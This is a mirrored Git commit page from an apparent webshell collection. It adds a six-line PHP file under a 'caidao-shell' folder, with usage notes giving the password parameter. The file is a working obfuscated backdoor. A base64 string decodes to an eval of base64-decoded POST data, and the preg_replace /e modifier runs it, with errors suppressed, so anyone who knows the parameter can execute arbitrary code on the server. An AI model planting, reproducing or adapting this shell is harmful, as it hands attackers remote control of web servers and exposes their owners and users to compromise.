mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Create w_2016-05-25.php
usage : shell.php?x=1 password "x" or shell.php password "x"
This commit is contained in:
parent
5ce79c1ab2
commit
b09d2eadcc
1 changed files with 6 additions and 0 deletions
6
caidao-shell/w_2016-05-25.php
Normal file
6
caidao-shell/w_2016-05-25.php
Normal file
|
@ -0,0 +1,6 @@
|
|||
<?php
|
||||
@$a = $_POST['x'];
|
||||
if(isset($a)){
|
||||
@preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
|
||||
}
|
||||
?>
|
Loading…
Reference in a new issue